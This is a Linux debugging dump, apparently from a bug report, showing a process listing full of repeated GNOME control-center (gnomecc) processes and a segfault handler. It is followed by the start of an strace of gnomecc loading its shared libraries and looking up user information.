nobody     490  0.0  0.0  3956    0 ?        SW   00:55   0:00 [httpd]
nobody     491  0.0  0.0  3956    0 ?        SW   00:55   0:00 [httpd]
nobody     492  0.0  0.0  3956    0 ?        SW   00:55   0:00 [httpd]
nobody     493  0.0  0.0  3956    0 ?        SW   00:55   0:00 [httpd]
nobody     494  0.0  0.0  3956    0 ?        SW   00:55   0:00 [httpd]
nobody     495  0.0  0.0  3956    0 ?        SW   00:55   0:00 [httpd]
nobody     496  0.0  0.0  3956    0 ?        SW   00:55   0:00 [httpd]
root       507  0.0  0.0  1456    8 ?        S    00:55   0:00 /usr/share/pvm3/lib/LINUX/pvmd3
xfs        576  0.0  0.8  3868  520 ?        S    00:55   0:18 xfs -droppriv -daemon -port -1
root       615  0.0  0.0  1092    0 tty2     SW   00:55   0:00 [mingetty]
root       616  0.0  0.0  1092    0 tty3     SW   00:55   0:00 [mingetty]
root       617  0.0  0.0  1092    0 tty4     SW   00:55   0:00 [mingetty]
root       618  0.0  0.0  1092    0 tty5     SW   00:55   0:00 [mingetty]
root       619  0.0  0.0  1092    0 tty6     SW   00:55   0:00 [mingetty]
root       620  0.0  0.0  2676    0 ?        SW   00:55   0:00 [gdm]
mab       1000  0.0  0.0  1368   28 ?        S    01:07   0:00 /home/mab/WP/shbin10/wpexc
root      2711  0.0  0.0  5792    0 ?        SW   11:53   0:00 [kppp]
root      3513  0.0  0.0  1556    0 ttyS0    SW   15:56   0:00 [pppd]
root      3881  1.3  5.4 59548 3448 ?        S    17:10   0:39 /etc/X11/X -auth /var/gdm/:0.Xauth :0
root      3882  0.0  0.0  3356    0 ?        SW   17:10   0:00 [gdm]
root      3902  0.6  0.7  5768  464 ?        S    17:34   0:09 /usr/bin/gnome-session
root      3966  0.0  0.1  5456  112 ?        S    17:34   0:01 gnome-smproxy --sm-config-prefix /.gnome-smproxy-BluGRL/ --sm-client-id 117f00000100009536
root      3970  0.2  0.8  4236  520 ?        S    17:34   0:03 [enlightenment]
root      3987  0.3  2.5  8660 1604 ?        S    17:34   0:05 panel --sm-config-prefix /panel.d/Session-NqGnWd/ --sm-client-id 117f000001000095355649500
root      3989  0.1  0.2  8204  132 ?        S    17:34   0:02 gmc --sm-config-prefix /gmc-5aIWrf/ --sm-client-id 117f000001000095355649600000055190010
root      3993  0.0  0.1  2676   80 ?        S    17:34   0:00 gnome-name-service
root      3999  0.1  0.2  5984  156 ?        S    17:34   0:02 gnomepager_applet --activate-goad-server gnomepager_applet
root      4001  0.0  0.1  5940  116 ?        S    17:34   0:00 gen_util_applet --activate-goad-server gen_util_applet
root      4009  1.3  0.8 23788  512 ?        S    17:38   0:18 [netscape-commun]
root      4030  0.0  0.0 16696    0 ?        SW   17:38   0:00 [netscape-commun]
root      4333  0.1  0.2  6128  188 ?        S    17:50   0:00 gnomecc
root      4336  0.0  0.0  1648    0 ?        SW   17:51   0:00 [mcext5D3IsH]
root      4337  0.2  0.3  6588  200 ?        S    17:51   0:01 bug-buddy --core=/root/core
root      4389  0.0  0.0  6668    0 ?        SW   17:55   0:00 [background-prop]
root      4397  0.0  0.2  5892  132 ?        S    17:55   0:00 gnomecc --activate-goad-server control_center
root      4400  0.0  0.3  5892  204 ?        S    17:55   0:00 gnomecc --activate-goad-server control_center
root      4403  0.0  0.7  5892  476 ?        S    17:55   0:00 gnomecc --activate-goad-server control_center
root      4406  0.0  1.0  5892  636 ?        S    17:55   0:00 gnomecc --activate-goad-server control_center
root      4409  0.0  0.9  5892  616 ?        S    17:55   0:00 gnomecc --activate-goad-server control_center
root      4412  0.0  0.6  5892  420 ?        S    17:55   0:00 gnomecc --activate-goad-server control_center
root      4415  0.0  1.0  5892  636 ?        S    17:55   0:00 gnomecc --activate-goad-server control_center
root      4418  0.0  1.0  5892  636 ?        S    17:55   0:00 gnomecc --activate-goad-server control_center
root      4421  0.0  0.3  5892  228 ?        S    17:55   0:00 gnomecc --activate-goad-server control_center
root      4424  0.0  0.9  5892  620 ?        S    17:55   0:00 gnomecc --activate-goad-server control_center
root      4427  0.0  1.0  5892  636 ?        S    17:55   0:00 gnomecc --activate-goad-server control_center
root      4430  0.0  0.0  5892    0 ?        SW   17:55   0:00 [gnomecc]
root      4433  0.0  0.6  5892  384 ?        S    17:55   0:00 gnomecc --activate-goad-server control_center
root      4436  0.0  1.0  5892  636 ?        S    17:55   0:00 gnomecc --activate-goad-server control_center
root      4439  0.0  1.0  5892  636 ?        S    17:55   0:00 gnomecc --activate-goad-server control_center
root      4442  0.0  1.0  5892  636 ?        S    17:55   0:00 gnomecc --activate-goad-server control_center
root      4445  0.0  0.7  5892  480 ?        S    17:55   0:00 gnomecc --activate-goad-server control_center
root      4448  0.0  1.0  5892  636 ?        S    17:55   0:00 gnomecc --activate-goad-server control_center
root      4451  0.0  0.3  5892  220 ?        S    17:55   0:00 gnomecc --activate-goad-server control_center
root      4454  0.0  0.8  5892  536 ?        S    17:55   0:00 gnomecc --activate-goad-server control_center
root      4457  0.0  0.9  5892  620 ?        S    17:56   0:00 gnomecc --activate-goad-server control_center
root      4460  0.0  0.9  5892  628 ?        S    17:56   0:00 gnomecc --activate-goad-server control_center
root      4463  0.0  0.9  5892  616 ?        S    17:56   0:00 gnomecc --activate-goad-server control_center
root      4466  0.0  1.0  5892  636 ?        S    17:56   0:00 gnomecc --activate-goad-server control_center
root      4469  0.0  0.9  5892  592 ?        S    17:56   0:00 gnomecc --activate-goad-server control_center
root      4472  0.0  1.0  5892  636 ?        S    17:56   0:00 gnomecc --activate-goad-server control_center
root      4475  0.0  1.0  5892  636 ?        S    17:56   0:00 gnomecc --activate-goad-server control_center
root      4478  0.0  0.5  5892  332 ?        S    17:56   0:00 gnomecc --activate-goad-server control_center
root      4481  0.0  0.9  5892  584 ?        S    17:56   0:00 gnomecc --activate-goad-server control_center
root      4484  0.0  1.0  5892  632 ?        S    17:56   0:00 gnomecc --activate-goad-server control_center
root      4487  0.0  1.0  5892  636 ?        S    17:56   0:00 gnomecc --activate-goad-server control_center
root      4490  0.0  1.0  5892  636 ?        S    17:56   0:00 gnomecc --activate-goad-server control_center
root      4493  0.1  1.0  5892  632 ?        S    17:56   0:00 gnomecc --activate-goad-server control_center
root      4496  0.1  0.7  5892  444 ?        S    17:56   0:00 gnomecc --activate-goad-server control_center
root      4499  0.0  0.9  5892  584 ?        S    17:56   0:00 gnomecc --activate-goad-server control_center
root      4502  0.0  1.0  5892  636 ?        S    17:56   0:00 gnomecc --activate-goad-server control_center
root      4505  0.0  1.0  5892  636 ?        S    17:56   0:00 gnomecc --activate-goad-server control_center
root      4508  0.0  0.9  5892  580 ?        S    17:56   0:00 gnomecc --activate-goad-server control_center
root      4511  0.0  1.0  5892  632 ?        S    17:56   0:00 gnomecc --activate-goad-server control_center
root      4514  0.0  0.9  5892  616 ?        S    17:56   0:00 gnomecc --activate-goad-server control_center
root      4517  0.0  1.0  5892  636 ?        S    17:56   0:00 gnomecc --activate-goad-server control_center
root      4520  0.0  0.2  5892  188 ?        S    17:56   0:00 gnomecc --activate-goad-server control_center
root      4523  0.0  1.0  5892  636 ?        S    17:56   0:00 gnomecc --activate-goad-server control_center
root      4526  0.0  0.8  5892  520 ?        S    17:56   0:00 gnomecc --activate-goad-server control_center
root      4529  0.1  1.0  5892  632 ?        S    17:56   0:00 gnomecc --activate-goad-server control_center
root      4532  0.0  1.0  5892  636 ?        S    17:56   0:00 gnomecc --activate-goad-server control_center
root      4535  0.0  0.9  5892  576 ?        S    17:56   0:00 gnomecc --activate-goad-server control_center
root      4538  0.0  1.0  5892  636 ?        S    17:56   0:00 gnomecc --activate-goad-server control_center
root      4541  0.0  0.9  5892  604 ?        S    17:56   0:00 gnomecc --activate-goad-server control_center
root      4544  0.0  1.0  5892  636 ?        S    17:56   0:00 gnomecc --activate-goad-server control_center
root      4547  0.0  0.9  5892  628 ?        S    17:56   0:00 gnomecc --activate-goad-server control_center
root      4550  0.0  1.0  5892  636 ?        S    17:56   0:00 gnomecc --activate-goad-server control_center
root      4553  0.0  1.0  5892  636 ?        S    17:56   0:00 gnomecc --activate-goad-server control_center
root      4556  0.0  1.0  5892  632 ?        S    17:56   0:00 gnomecc --activate-goad-server control_center
root      4559  0.1  0.9  5892  628 ?        S    17:56   0:00 gnomecc --activate-goad-server control_center
root      4562  0.0  1.0  5892  636 ?        S    17:56   0:00 gnomecc --activate-goad-server control_center
root      4565  0.0  0.9  5892  592 ?        S    17:56   0:00 gnomecc --activate-goad-server control_center
root      4568  0.0  1.0  5892  636 ?        S    17:56   0:00 gnomecc --activate-goad-server control_center
root      4571  0.0  0.4  5892  304 ?        S    17:56   0:00 gnomecc --activate-goad-server control_center
root      4574  0.0  1.0  5892  632 ?        S    17:56   0:00 gnomecc --activate-goad-server control_center
root      4582  0.0  0.9  5576  576 ?        S    17:56   0:00 /usr/bin/gnome_segv gnomecc 11 1.0.51
root      4589  0.0  0.1  1092   64 tty1     S    17:58   0:00 /sbin/mingetty tty1
root      4591  4.3  2.9  6748 1832 ?        S    17:59   0:02 konsole -icon /usr/share/icons/konsole.xpm -caption Terminal Emulation
root      4594  0.6  0.8  1736  544 pts/0    S    18:00   0:00 /bin/bash
root      4601  0.0  1.7  2808 1128 pts/0    R    18:00   0:00 ps -uaxw
strace output while everything is occuring:
execve(/usr/bin/gnomecc [gnomecc] [/* 33 vars */]) = 0
brk(0)                                  = 0x8050ab0
old_mmap(NULL 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_ANONYMOUS -1 0) = 0x40014000
open(/etc/ld.so.preload O_RDONLY)    = -1 ENOENT (No such file or directory)
open(/etc/ld.so.cache O_RDONLY)      = 4
fstat(4 {st_mode=S_IFREG|0644 st_size=21464 ...}) = 0
old_mmap(NULL 21464 PROT_READ MAP_PRIVATE 4 0) = 0x40015000
close(4)                                = 0
open(/usr/lib/libcapplet.so.0 O_RDONLY) = 4
fstat(4 {st_mode=S_IFREG|0755 st_size=37320 ...}) = 0
read(4 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\360)\0... 4096) = 4096
old_mmap(NULL 30336 PROT_READ|PROT_EXEC MAP_PRIVATE 4 0) = 0x4001b000
mprotect(0x40022000 1664 PROT_NONE)   = 0
old_mmap(0x40022000 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 4 0x6000) = 0x40022000
close(4)                                = 0
open(/usr/lib/libORBitCosNaming.so.0 O_RDONLY) = 4
fstat(4 {st_mode=S_IFREG|0755 st_size=30736 ...}) = 0
read(4 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\320)\0... 4096) = 4096
old_mmap(NULL 33736 PROT_READ|PROT_EXEC MAP_PRIVATE 4 0) = 0x40023000
mprotect(0x4002a000 5064 PROT_NONE)   = 0
old_mmap(0x4002a000 8192 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 4 0x6000) = 0x4002a000
close(4)                                = 0
open(/usr/lib/libORBit.so.0 O_RDONLY) = 4
fstat(4 {st_mode=S_IFREG|0755 st_size=253492 ...}) = 0
read(4 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\360\v\1... 4096) = 4096
old_mmap(NULL 256496 PROT_READ|PROT_EXEC MAP_PRIVATE 4 0) = 0x4002c000
mprotect(0x40067000 14832 PROT_NONE)  = 0
old_mmap(0x40067000 16384 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 4 0x3a000) = 0x40067000
close(4)                                = 0
open(/usr/lib/libIIOP.so.0 O_RDONLY) = 4
fstat(4 {st_mode=S_IFREG|0755 st_size=52616 ...}) = 0
read(4 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\300I\0... 4096) = 4096
old_mmap(NULL 59620 PROT_READ|PROT_EXEC MAP_PRIVATE 4 0) = 0x4006b000
mprotect(0x40077000 10468 PROT_NONE)  = 0
old_mmap(0x40077000 8192 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 4 0xb000) = 0x40077000
old_mmap(0x40079000 2276 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS -1 0) = 0x40079000
close(4)                                = 0
open(/usr/lib/libORBitutil.so.0 O_RDONLY) = 4
fstat(4 {st_mode=S_IFREG|0755 st_size=4484 ...}) = 0
read(4 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\0\t\0\000... 4096) = 4096
old_mmap(NULL 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_ANONYMOUS -1 0) = 0x4007a000
old_mmap(NULL 7484 PROT_READ|PROT_EXEC MAP_PRIVATE 4 0) = 0x4007b000
mprotect(0x4007c000 3388 PROT_NONE)   = 0
old_mmap(0x4007c000 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 4 0) = 0x4007c000
close(4)                                = 0
open(/usr/lib/libglib-1.2.so.0 O_RDONLY) = 4
fstat(4 {st_mode=S_IFREG|0755 st_size=164253 ...}) = 0
read(4 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\300b\0... 4096) = 4096
old_mmap(NULL 139732 PROT_READ|PROT_EXEC MAP_PRIVATE 4 0) = 0x4007d000
mprotect(0x4009e000 4564 PROT_NONE)   = 0
old_mmap(0x4009e000 8192 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 4 0x20000) = 0x4009e000
close(4)                                = 0
open(/lib/libnsl.so.1 O_RDONLY)      = 4
fstat(4 {st_mode=S_IFREG|0755 st_size=370141 ...}) = 0
read(4 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20?\0\000... 4096) = 4096
old_mmap(NULL 88104 PROT_READ|PROT_EXEC MAP_PRIVATE 4 0) = 0x400a0000
mprotect(0x400b2000 14376 PROT_NONE)  = 0
old_mmap(0x400b2000 8192 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 4 0x11000) = 0x400b2000
old_mmap(0x400b4000 6184 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS -1 0) = 0x400b4000
close(4)                                = 0
open(/lib/libm.so.6 O_RDONLY)        = 4
fstat(4 {st_mode=S_IFREG|0755 st_size=527346 ...}) = 0
read(4 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\320F\0... 4096) = 4096
old_mmap(NULL 117112 PROT_READ|PROT_EXEC MAP_PRIVATE 4 0) = 0x400b6000
mprotect(0x400d2000 2424 PROT_NONE)   = 0
old_mmap(0x400d2000 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 4 0x1b000) = 0x400d2000
close(4)                                = 0
open(/lib/libdl.so.2 O_RDONLY)       = 4
fstat(4 {st_mode=S_IFREG|0755 st_size=75227 ...}) = 0
read(4 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\34... 4096) = 4096
old_mmap(NULL 12428 PROT_READ|PROT_EXEC MAP_PRIVATE 4 0) = 0x400d3000
mprotect(0x400d5000 4236 PROT_NONE)   = 0
old_mmap(0x400d5000 8192 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 4 0x1000) = 0x400d5000
close(4)                                = 0
open(/usr/lib/libgnorba.so.27 O_RDONLY) = 4
fstat(4 {st_mode=S_IFREG|0755 st_size=73245 ...}) = 0
read(4 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\300C\0... 4096) = 4096
old_mmap(NULL 47812 PROT_READ|PROT_EXEC MAP_PRIVATE 4 0) = 0x400d7000
mprotect(0x400e2000 2756 PROT_NONE)   = 0
old_mmap(0x400e2000 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 4 0xa000) = 0x400e2000
close(4)                                = 0
open(/usr/lib/libgnomeui.so.32 O_RDONLY) = 4
fstat(4 {st_mode=S_IFREG|0755 st_size=952302 ...}) = 0
read(4 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\341... 4096) = 4096
old_mmap(NULL 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_ANONYMOUS -1 0) = 0x400e3000
old_mmap(NULL 821368 PROT_READ|PROT_EXEC MAP_PRIVATE 4 0) = 0x400e4000
mprotect(0x401a6000 26744 PROT_NONE)  = 0
old_mmap(0x401a6000 28672 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 4 0xc1000) = 0x401a6000
close(4)                                = 0
open(/usr/lib/libart_lgpl.so.2 O_RDONLY) = 4
fstat(4 {st_mode=S_IFREG|0755 st_size=65520 ...}) = 0
read(4 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\33... 4096) = 4096
old_mmap(NULL 57968 PROT_READ|PROT_EXEC MAP_PRIVATE 4 0) = 0x401ad000
mprotect(0x401bb000 624 PROT_NONE)    = 0
old_mmap(0x401bb000 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 4 0xd000) = 0x401bb000
close(4)                                = 0
open(/usr/lib/libgdk_imlib.so.1 O_RDONLY) = 4
fstat(4 {st_mode=S_IFREG|0755 st_size=142656 ...}) = 0
read(4 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0 &lt;\0\000... 4096) = 4096
old_mmap(NULL 145740 PROT_READ|PROT_EXEC MAP_PRIVATE 4 0) = 0x401bc000
mprotect(0x401df000 2380 PROT_NONE)   = 0
old_mmap(0x401df000 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 4 0x22000) = 0x401df000
close(4)                                = 0
open(/usr/X11R6/lib/libSM.so.6 O_RDONLY) = 4
fstat(4 {st_mode=S_IFREG|0755 st_size=40684 ...}) = 0
read(4 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\\0... 4096) = 4096
old_mmap(NULL 37384 PROT_READ|PROT_EXEC MAP_PRIVATE 4 0) = 0x401e0000
mprotect(0x401e8000 4616 PROT_NONE)   = 0
old_mmap(0x401e8000 8192 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 4 0x7000) = 0x401e8000
close(4)                                = 0
open(/usr/X11R6/lib/libICE.so.6 O_RDONLY) = 4
fstat(4 {st_mode=S_IFREG|0755 st_size=95790 ...}) = 0
read(4 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0 5\0\000... 4096) = 4096
old_mmap(NULL 91952 PROT_READ|PROT_EXEC MAP_PRIVATE 4 0) = 0x401ea000
mprotect(0x401fe000 10032 PROT_NONE)  = 0
old_mmap(0x401fe000 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 4 0x13000) = 0x401fe000
old_mmap(0x401ff000 5936 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS -1 0) = 0x401ff000
close(4)                                = 0
open(/usr/lib/libgtk-1.2.so.0 O_RDONLY) = 4
fstat(4 {st_mode=S_IFREG|0755 st_size=1356259 ...}) = 0
read(4 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0`\27\2\000... 4096) = 4096
old_mmap(NULL 1176532 PROT_READ|PROT_EXEC MAP_PRIVATE 4 0) = 0x40201000
mprotect(0x40318000 33748 PROT_NONE)  = 0
old_mmap(0x40318000 32768 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 4 0x116000) = 0x40318000
old_mmap(0x40320000 980 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS -1 0) = 0x40320000
close(4)                                = 0
open(/usr/lib/libgdk-1.2.so.0 O_RDONLY) = 4
fstat(4 {st_mode=S_IFREG|0755 st_size=247657 ...}) = 0
read(4 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260\240... 4096) = 4096
old_mmap(NULL 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_ANONYMOUS -1 0) = 0x40321000
old_mmap(NULL 211924 PROT_READ|PROT_EXEC MAP_PRIVATE 4 0) = 0x40322000
mprotect(0x40354000 7124 PROT_NONE)   = 0
old_mmap(0x40354000 8192 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 4 0x31000) = 0x40354000
close(4)                                = 0
open(/usr/lib/libgmodule-1.2.so.0 O_RDONLY) = 4
fstat(4 {st_mode=S_IFREG|0644 st_size=12211 ...}) = 0
read(4 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\r\0\000... 4096) = 4096
old_mmap(NULL 11796 PROT_READ|PROT_EXEC MAP_PRIVATE 4 0) = 0x40356000
mprotect(0x40358000 3604 PROT_NONE)   = 0
old_mmap(0x40358000 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 4 0x1000) = 0x40358000
close(4)                                = 0
open(/usr/X11R6/lib/libXext.so.6 O_RDONLY) = 4
fstat(4 {st_mode=S_IFREG|0755 st_size=54591 ...}) = 0
read(4 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@&amp;\0\000... 4096) = 4096
old_mmap(NULL 46272 PROT_READ|PROT_EXEC MAP_PRIVATE 4 0) = 0x40359000
mprotect(0x40363000 5312 PROT_NONE)   = 0
old_mmap(0x40363000 8192 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 4 0x9000) = 0x40363000
close(4)                                = 0
open(/usr/X11R6/lib/libX11.so.6 O_RDONLY) = 4
fstat(4 {st_mode=S_IFREG|0755 st_size=800157 ...}) = 0
read(4 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@?\1\000... 4096) = 4096
old_mmap(NULL 671912 PROT_READ|PROT_EXEC MAP_PRIVATE 4 0) = 0x40365000
mprotect(0x40403000 24744 PROT_NONE)  = 0
old_mmap(0x40403000 24576 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 4 0x9d000) = 0x40403000
old_mmap(0x40409000 168 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS -1 0) = 0x40409000
close(4)                                = 0
open(/usr/lib/libgnome.so.32 O_RDONLY) = 4
fstat(4 {st_mode=S_IFREG|0755 st_size=109264 ...}) = 0
read(4 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\320W\0... 4096) = 4096
old_mmap(NULL 89920 PROT_READ|PROT_EXEC MAP_PRIVATE 4 0) = 0x4040a000
mprotect(0x4041f000 3904 PROT_NONE)   = 0
old_mmap(0x4041f000 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 4 0x14000) = 0x4041f000
close(4)                                = 0
open(/usr/lib/libgnomesupport.so.0 O_RDONLY) = 4
fstat(4 {st_mode=S_IFREG|0755 st_size=22667 ...}) = 0
read(4 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\0\21\0... 4096) = 4096
old_mmap(NULL 20672 PROT_READ|PROT_EXEC MAP_PRIVATE 4 0) = 0x40420000
mprotect(0x40424000 4288 PROT_NONE)   = 0
old_mmap(0x40424000 8192 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 4 0x3000) = 0x40424000
close(4)                                = 0
open(/usr/lib/libesd.so.0 O_RDONLY)  = 4
fstat(4 {st_mode=S_IFREG|0755 st_size=24528 ...}) = 0
read(4 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\360\35... 4096) = 4096
old_mmap(NULL 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_ANONYMOUS -1 0) = 0x40426000
old_mmap(NULL 27528 PROT_READ|PROT_EXEC MAP_PRIVATE 4 0) = 0x40427000
mprotect(0x4042d000 2952 PROT_NONE)   = 0
old_mmap(0x4042d000 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 4 0x5000) = 0x4042d000
close(4)                                = 0
open(/usr/lib/libaudiofile.so.0 O_RDONLY) = 4
fstat(4 {st_mode=S_IFREG|0755 st_size=182987 ...}) = 0
read(4 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\'\0... 4096) = 4096
old_mmap(NULL 72932 PROT_READ|PROT_EXEC MAP_PRIVATE 4 0) = 0x4042e000
mprotect(0x4043f000 3300 PROT_NONE)   = 0
old_mmap(0x4043f000 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 4 0x10000) = 0x4043f000
close(4)                                = 0
open(/lib/libdb.so.2 O_RDONLY)       = 4
fstat(4 {st_mode=S_IFREG|0755 st_size=218979 ...}) = 0
read(4 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\24\0\000... 4096) = 4096
old_mmap(NULL 54232 PROT_READ|PROT_EXEC MAP_PRIVATE 4 0) = 0x40440000
mprotect(0x4044d000 984 PROT_NONE)    = 0
old_mmap(0x4044d000 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 4 0xc000) = 0x4044d000
close(4)                                = 0
open(/lib/libc.so.6 O_RDONLY)        = 4
fstat(4 {st_mode=S_IFREG|0755 st_size=4073346 ...}) = 0
read(4 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\10\212... 4096) = 4096
old_mmap(NULL 999580 PROT_READ|PROT_EXEC MAP_PRIVATE 4 0) = 0x4044e000
mprotect(0x4053b000 28828 PROT_NONE)  = 0
old_mmap(0x4053b000 16384 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 4 0xec000) = 0x4053b000
old_mmap(0x4053f000 12444 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS -1 0) = 0x4053f000
close(4)                                = 0
open(/usr/lib/libz.so.1 O_RDONLY)    = 4
fstat(4 {st_mode=S_IFREG|0755 st_size=62885 ...}) = 0
read(4 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260\27... 4096) = 4096
old_mmap(NULL 58092 PROT_READ|PROT_EXEC MAP_PRIVATE 4 0) = 0x40543000
mprotect(0x4054f000 8940 PROT_NONE)   = 0
old_mmap(0x4054f000 12288 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 4 0xb000) = 0x4054f000
close(4)                                = 0
open(/usr/X11R6/lib/libXi.so.6 O_RDONLY) = 4
fstat(4 {st_mode=S_IFREG|0755 st_size=36567 ...}) = 0
read(4 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260\24... 4096) = 4096
old_mmap(NULL 30400 PROT_READ|PROT_EXEC MAP_PRIVATE 4 0) = 0x40552000
mprotect(0x40559000 1728 PROT_NONE)   = 0
old_mmap(0x40559000 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 4 0x6000) = 0x40559000
close(4)                                = 0
old_mmap(NULL 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_ANONYMOUS -1 0) = 0x4055a000
mprotect(0x4044e000 970752 PROT_READ|PROT_WRITE) = 0
mprotect(0x4044e000 970752 PROT_READ|PROT_EXEC) = 0
mprotect(0x401ad000 57344 PROT_READ|PROT_WRITE) = 0
mprotect(0x401ad000 57344 PROT_READ|PROT_EXEC) = 0
mprotect(0x4006b000 49152 PROT_READ|PROT_WRITE) = 0
mprotect(0x4006b000 49152 PROT_READ|PROT_EXEC) = 0
munmap(0x40015000 21464)               = 0
personality(PER_LINUX)                  = 0
getpid()                                = 4953
brk(0)                                  = 0x8050ab0
brk(0x8050ad0)                          = 0x8050ad0
brk(0x8051000)                          = 0x8051000
brk(0x8052000)                          = 0x8052000
getuid()                                = 0
socket(PF_UNIX SOCK_STREAM 0)         = 4
connect(4 {sin_family=AF_UNIX path=                                                                                       /var/run/.nscd_socket} 110) = -1 ECONNREFUSED (Connection refused)
close(4)                                = 0
open(/etc/nsswitch.conf O_RDONLY)    = 4
fstat(4 {st_mode=S_IFREG|0644 st_size=1744 ...}) = 0
old_mmap(NULL 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_ANONYMOUS -1 0) = 0x40015000
read(4 #\n# /etc/nsswitch.conf\n#\n# An ex... 4096) = 1744
read(4  4096)                       = 0
close(4)                                = 0
munmap(0x40015000 4096)                = 0
open(/etc/ld.so.cache O_RDONLY)      = 4
fstat(4 {st_mode=S_IFREG|0644 st_size=21464 ...}) = 0
old_mmap(NULL 21464 PROT_READ MAP_PRIVATE 4 0) = 0x40015000
close(4)                                = 0
open(/lib/libnss_files.so.2 O_RDONLY) = 4
fstat(4 {st_mode=S_IFREG|0755 st_size=246168 ...}) = 0
read(4 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p \0\000... 4096) = 4096
old_mmap(NULL 36384 PROT_READ|PROT_EXEC MAP_PRIVATE 4 0) = 0x4055b000
mprotect(0x40563000 3616 PROT_NONE)   = 0
old_mmap(0x40563000 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 4 0x7000) = 0x40563000
close(4)                                = 0
munmap(0x40015000 21464)               = 0
open(/etc/passwd O_RDONLY)           = 4
fcntl(4 F_GETFD)                       = 0
fcntl(4 F_SETFD FD_CLOEXEC)           = 0
fstat(4 {st_mode=S_IFREG|0644 st_size=720 ...}) = 0
